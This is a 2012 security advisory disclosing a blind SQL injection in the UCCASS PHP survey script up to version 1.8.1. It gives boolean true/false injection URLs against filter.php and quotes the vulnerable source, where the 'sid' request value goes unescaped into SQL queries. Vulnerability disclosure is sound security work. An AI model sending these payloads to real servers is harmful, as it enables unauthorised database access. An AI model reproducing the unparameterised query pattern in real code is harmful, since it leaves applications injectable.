:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-06-22 ]
#################################################################
# [ UCCASS <= v1.8.1 ] Blind SQL Injection Vulnerability #
#################################################################
#
# Script: "The Unit Command Climate Assessment and Survey System (UCCASS) (pronounced yoo-kas)
# is a PHP based survey script that allows you to create online surveys..."
#
# Vendor: http://sourceforge.net/projects/uccass/
# Download: http://sourceforge.net/projects/uccass/files/latest/download
#
################################################################
#
# [SQL]
#
# Versions affected: v1.8.1 and previous
#
# Vuln: http://localhost/uccass/filter.php?sid=-1 or 1=1-- (true)
# http://localhost/uccass/filter.php?sid=-1 or 1=2-- (false)
#
File: ./uccass/filter.php
...cut...
<?php
include('classes/main.class.php');
include('classes/results.class.php'); // 1 definition of filter function
$survey = new UCCASS_Results;
echo $survey->com_header("Filter Survey Results");
echo $survey->filter($_REQUEST['sid']); // 2 unfiltered $_REQUEST['sid'] var
echo $survey->com_footer();
?>
...cut...
File: ./uccass/classes/results.class.php ( lines: 441-479 )
...cut...
function filter($sid)
{
$x = 0;
$qid_list = '';
foreach($_REQUEST['select_qid'] as $qid)
{ $qid_list .= (int)$qid . ','; }
$qid_list = substr($qid_list,0,-1);
$query = "SELECT at.aid, q.qid, q.question, s.survey_text_mode
FROM {$this->CONF['db_tbl_prefix']}answer_types at,
{$this->CONF['db_tbl_prefix']}questions q, {$this->CONF['db_tbl_prefix']}surveys s
WHERE q.aid = at.aid AND q.sid = $sid AND q.qid IN ($qid_list) AND at.type IN ('MM','MS') // 3 [SQL]
AND q.sid = s.sid
ORDER BY q.page, q.oid";
$rs = $this->db->Execute($query);
$old_aid = '';
if($rs === FALSE) { $this->error("Error selecting filter questions: " . $this->db->ErrorMsg()); }
if($r = $rs->FetchRow())
{
do
{
$question['question'][] = nl2br($this->SfStr->getSafeString($r['question'],$r['survey_text_mode']));
$question['encquestion'][] = $this->SfStr->getSafeString($r['question'],SAFE_STRING_TEXT);
$question['aid'][] = $r['aid'];
$question['qid'][] = $r['qid'];
$temp = $this->get_answer_values($r['aid'],BY_AID,$r['survey_text_mode']);
$question['value'][] = $temp['value'];
$question['avid'][] = $temp['avid'];
$x++;
}while($r = $rs->FetchRow());
$this->smarty->assign("question",$question);
}
$rs = $this->db->Execute("SELECT MIN(entered) AS mindate,
MAX(entered) AS maxdate FROM
{$this->CONF['db_tbl_prefix']}results WHERE sid = $sid"); // 4 [SQL]
if($rs === FALSE) { $this->error("Error selecting min/max survey dates: " . $this->db->ErrorMsg()); }
$r = $rs->FetchRow();
...cut...
### [ dun / 2012 ] #####################################################